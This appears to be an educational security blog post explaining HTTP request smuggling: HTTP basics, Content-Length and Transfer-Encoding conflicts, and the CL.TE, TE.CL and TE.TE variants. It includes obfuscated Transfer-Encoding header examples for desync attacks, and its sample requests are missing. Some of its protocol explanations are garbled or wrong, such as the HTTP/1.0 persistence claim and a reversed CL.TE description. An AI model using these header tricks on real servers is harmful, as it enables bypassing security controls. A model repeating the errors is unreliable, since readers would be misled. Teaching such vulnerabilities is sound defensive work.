The HTTP Request Smuggling vulnerability, also known as the HTTP Desync Attack, has been around for a while but was brought back to attention by security researcher James Kettle in 2019.
Initially, I found his paper on the subject to be challenging, but after conducting some research and breaking it down into smaller concepts, I realized that understanding a few basic HTTP concepts is all that is needed to understand this vulnerability.
In this blog, I will attempt to simplify the topic of HTTP Request Smuggling as much as possible. Let’s begin with HTTP.
What is HTTP?
The protocol known as HTTP (Hypertext Transfer Protocol) is used to send data across the internet. It serves as the core of the World Wide Web and enables users to access and exchange data online. When using HTTP, a client (like a web browser) sends a request to a server (like a web server) in order to access a specific resource.
The requested resource is then returned by the server, or if it cannot be located, an error message is returned. HTTP provides the transport of a variety of data kinds, including text, photos, videos, and audio, and allows communication between web servers and clients through the use of several methods, including GET and POST.
What is URI and URL?
URI: Uniform Resource Identifier
Every URL is also a URI, although there are some URIs that are not URLs. URIs identify, while URLs locate; nonetheless, locators are also identifiers.
URL: Uniform Resource Locator
This is a locator, which serves as an identification of that specific place. Since all URLs are URIs, it functions as both a URL and a URI and also denotes me as a “resident of.” It specifically identifies me in this instance, but if I got a roommate, that would alter.
What Makes HTTP Communication Work?
- The HTTP server, the main element of an HTTP-based system, is in charge of accepting and processing client requests as well as delivering the proper responses.
- HTTP client, often a web browser or mobile application, is the part that sends requests to the HTTP server.
- Request and response messages: These are the communications that take place between the client and server when a request for information is made, and a response is given.
- Protocols: The HTTP protocol establishes the guidelines and customs for client-server communication.
- Network infrastructure: To allow communication between clients and servers, the HTTP-based system depends on a network infrastructure, such as the internet.
- Data storage and retrieval: To store and retrieve data in response to client requests, the HTTP server may employ a database or other data storage system.
- Security: To secure communication and safeguard sensitive data, the HTTP-based system may employ authentication and encryption mechanisms.
- User interface: A web browser or mobile application is often used as the user interface by users to engage with the system.
- Performance and Scalability: The HTTP-based system needs to be scalable and able to handle large numbers of requests.
Why Does HTTP Use TCP?
Because it offers a dependable and secure connection between a client and a server,
TCP is utilized with HTTP. In order to maintain the integrity of HTTP communications, TCP makes sure that all data is delivered in the right order and that any lost or damaged data is retransmitted. TCP also uses flow control and error checking algorithms to avoid data overload and guarantee efficient communication between the client and server. This is crucial for HTTP because it enables quick and easy communication between a web browser and a web server.
On a web site, actions can be taken using the HTTP methods. The most popular HTTP methods include:
GET: a method for getting data from a server.
POST: a method of transferring data to a server for processing or archiving.
PUT: used to update a server resource that already exists.
DELETE: used to remove a server resource.
HEAD: used to obtain a resource’s headers alone, not its body.
PATCH: used to update a server’s partial resource.
OPTIONS: used to get the server’s list of accepted HTTP methods.
TRACE: used to check the client and server’s connectivity.
HTTP Status Codes:
HTTP status codes are numeric codes that represent a web request’s status. The server sends these codes back to the client to let them know how a request has gone.
- Informational Response Status Codes: (100-199)
- Successful Response Status Codes: (200-299)
- Redirection Message Status Codes: (300-399)
- Client-Side Response Error Status Codes: (400-499)
- Server-Side Response Error Status Codes: (500-599)
What is the Difference Between HTTP 1.0 and HTTP 1.1?
HTTP 1.1 is a more complicated protocol that adds extra capabilities including permanent connections, caching, and support for multiple concurrent queries. HTTP 1.0 is a straightforward request-response protocol. Through the use of chunked transfer encoding and improved error handling, HTTP 1.1 also enables higher performance.
By default, every HTTP request made using HTTP/1.0 creates a TCP connection. The TCP connection will remain open, or what you may refer to as persistent, and HTTP requests can be sent one after the other. This behavior might be manually modified if you inserted the Connection: keep-alive in the request.
Multiple HTTP requests can be sent using the same connection when using HTTP/1.1, which by default persists a TCP connection. To close the connection instead after getting a complete response or after a timeout, use the Connection: close header.
What is Chunked Encoding?
Chunked encoding is a method for sending data over the internet that splits the data into manageable chunks rather than sending it all at once. This method can be used to take advantage of the request smuggling security flaw. Attackers may be able to trick servers into accepting more requests by manipulating the way data is sent in chunks. By doing this, they may be able to bypass security measures and maybe obtain access to confidential data.
Sample Request for Chunked Encoding
Types of Client-Server Architecture
A client device (such as a personal computer or mobile device) communicates with a central server to access resources or services in a client-server computing architecture.
In this design, the server reacts to the client device’s request for information or services by providing it with the requested information.
There are two main types of client-server architecture:
- Two-tier architecture: In this sort of architecture, the client device communicates directly with the server. The server responds with the information or service requested after receiving a request from the client device.
- Three-tier architecture: In this design, the client device and server communicate via an extra layer known as the application server. The client’s request must be processed by the application server before being sent to the server for processing. The requested information or service is subsequently provided by the server in response, and the client device receives it via the application server.
What is HTTP Request Smuggling?
A method for interfering with how a website handles sequences of HTTP requests that are sent by one or more users is called HTTP request smuggling. The nature of request smuggling vulnerabilities is frequently critical, giving an attacker the ability to go around security measures, access private information without authorization, and directly compromise other application users.
How are Requests Differentiated by Servers?
Servers examine the requested URL, the request method (such as GET or POST), and the headers and arguments to distinguish between requests. This data is used by the server to decide what tasks to carry out and what resources to return in response to the request.
The GET request includes headers and a URL. An HTTP/version number in the URL denotes the conclusion. The server only accepts headers and values that it recognizes, rejecting any that it does not. A GET request ends when the headers have finished.
Receiving requests doesn’t appear to be much of a problem, does it?
POST requests, what about them? POST bodies differ from one application to the next and from one framework to the next. Two headers are therefore present to differentiate.
- Content-Length: The body of a request or response is measured in bytes and is indicated by the Content-Length header. By calculating the quantity of data that will be transmitted across the network, this can be helpful in avoiding problems caused by excessive payloads. It can be accessed through the header’s property of an HTTP request or response object and is commonly included in HTTP requests and responses.
- Transfer-Encoding: An HTTP header called Transfer-Encoding describes the kind of encoding that will be used to send the body of a request or response. Usually, the message body is compressed with the help of this header to increase message transfer speed. “Chunked,” “compress,” “deflate,” and “gzip” are a few typical choices for the Transfer-Encoding header.
How is this Issue caused?
The front-end server defines the content-length, and the back-end server defines the transfer-encoding when a request is sent. Request smuggling is the result of the same request being handled differently by separate servers, which prevents the request from synchronizing and leads to an unexpected outcome or response error.
Now that we know, we can send many HTTP requests using Real-Time N-Tier Client Server Architecture across a single TCP/IP connection. A request can be identified by its Content Length (CL), Transfer Encoding (TE), and header.
The front-end and back-end systems must be able to discern between these requests effectively; otherwise, an attacker may send a malicious request that the front-end and back-end systems treat differently.
A request may use any or both of these techniques to indicate where it terminates, depending on the situation. The HTTP protocol states that if both the Transfer-Encoding and Content-Length headers are present, the Content-Length header shall be disregarded. But this might not be enough if several servers are in use! Now here’s the issue:
- Transfer-Encoding headers are not supported by all servers.
- The Transfer-Encoding header is supported by some servers.
As a result, confusion arises when front-end and back-end services disagree on this request distinction.
The attacker may then design a request that makes use of the CL and TE headers in a way that causes the front end and back end to each handle the request differently.
Therefore, many scenarios can be specified in light of this:
- CL.TE: The back-end server utilizes the Transfer-Encoding header whereas the front-end server uses the Content-Length header.
- TE.CL: The Transfer-Encoding header is used by the front-end server, and the Content-Length header by the back-end server.
- TE.TE: The Transfer-Encoding header is supported by both the front-end and backend servers, however obfuscating the header in some way can make one server decide not to handle it.
Request smuggling in a CL.TE attack, the attacker tries to change a web application’s request headers in an effort to get around security measures and obtain confidential data. In order to trick the server and get it to interpret the request in a way that gives the attacker access to protected resources, the attacker modifies the Content-Length and Transfer-Encoding headers in the request.
An attacker might, for instance, send a request to a web application with the headers:
126 bytes in length, chunked transfer encoding
The attacker inserts two distinct requests, with the 2nd request as a part of the first requests POST body. The frontend server, which accepts Content length, treats the entire payload as one request. The backend server that accepts Transfer Encoding, sees that the length of the POST body is 0 and hence treats the payloads as 2 different requests.
Sample HTTP Request For CL.TE
The Transfer-Encoding header is processed by the front-end server, which interprets the message content as chunked. It processes both chunks and forwards the request to the backend server. The back-end server receives the request and observes the Content Length is defined as 4, So its processes the first 4 bytes in POST body. Anything that is read after the first 4 bytes treated as a new request.
Sample HTTP Request for TE.CL
The back-end server determines the request body is 4 bytes long up to the line 7 in response to the Content-Length header. The bytes after this will be seen by the back-end server as the start of the subsequent request in the chain.
The Transfer-Encoding header is supported by both the front-end server and the backend server, but the front-end server can avoid processing it by obfuscating it.
Transfer-Encoding headers can be hidden in a variety of ways. For instance:
Transfer-Encoding : chunked
X: X[\n]Transfer-Encoding: chunked
By modifying the Transfer-Encoding header so that only one of the front-end or backend servers processes it and the other ignores it, TE.TE vulnerabilities might be found.
The attack will resemble the TE.CL and CL.TE vulnerabilities previously mentioned depending on whether the front-end or back-end server ignores the obfuscated Transfer-Encoding header.
Sample HTTP Request For TE.TE
In conclusion, we covered the basics of HTTP request smuggling, understanding its mechanisms and types of attacks. In the next part, we will explore attack vectors, including real-world scenarios and techniques used by attackers. Stay tuned for valuable insights on defending against these vulnerabilities and enhancing web application security.
Contributor: Prajyot Chemburkar